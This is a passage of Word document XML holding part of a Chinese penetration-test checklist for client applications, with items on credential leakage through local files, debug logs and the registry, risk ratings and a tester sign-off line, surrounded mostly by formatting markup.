                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="301C3F6C">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.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>本地文件安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB3CADD">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检测所有的本地文件，查看是否存在配置文件泄露数据库密码、用户密码缓存文件等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B7A2E11">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79461B56">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1547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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19FA2FEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E0CE486">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>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b）应保证存有敏感数据的存储空间被释放或重新分配前得到完全清除；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FA7AB37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A4FC2A1">
            <w:pPr>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b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>本地调试安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E604236">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应用开启本地调试功能后，登录后的用户名和密码会被保存在调试日志内，这样就可能被有心人利用，从而获取用户的登录信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DD8D44D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32558123">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23A00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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BC02867">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45DADB4C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="781BD164">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01AE7CFF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>本地注册表安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3CE0EA">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>应用登录后，可能会将登录信息存放在注册表里，导致用户名密码等敏感信息泄露。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="608D46F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26E7BF3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>□已测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="3611" w:tblpY="-859"/>
        <w:tblW w:w="7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6"/>
      </w:tblGrid>
      <w:tr w14:paraId="00B7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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="095DDA20">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BBE4865">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应对所有高风险测试项进行截图并填写到测试项核对表，对中风险与低风险项逐一对应测评项完成勾选确认。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA00662">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0694BCA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2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74"/>
        <w:gridCol w:w="6974"/>
      </w:tblGrid>
      <w:tr w14:paraId="3A51A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974" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EDE9731">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>渗透工程师签字：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">                 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6974" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5B0167">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>日期：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="22"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">                   </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F5175EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId3" w:type="default"/>
      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
      <w:pgMar w:top="567" w:right="1440" w:bottom="709" w:left="1440" w:header="851" w:footer="43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 w:name="PingFang SC">
    <w:altName w:val="微软雅黑"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000017" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="ArialMT">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KSOF0B7949D1">
    <w:panose1 w:val="02010609060101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="KSOF0B79BE3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sdt>
        <w:sdtPr>
          <w:id w:val="1728636285"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:p w14:paraId="02F4534B">
            <w:pPr>
              <w:pStyle w:val="18"/>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65C34701">
    <w:pPr>
      <w:pStyle w:val="1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2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000002A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="432"/>
        </w:tabs>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="000000"/>
        <w:spacing w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="576"/>
        </w:tabs>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="000000"/>
        <w:spacing w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="000000"/>
        <w:spacing w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="864"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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pStyle w:val="12"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1584"/>
        </w:tabs>
        <w:ind w:left="1584" w:hanging="1584"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="034C3139"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="034C3139"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1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5756154"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15756154"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="9"/>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7484F2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17484F2F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="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8BE3C35"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28BE3C35"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="3"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="6"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="7"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="8"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="21"/>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3AFEAA81"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3AFEAA81"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
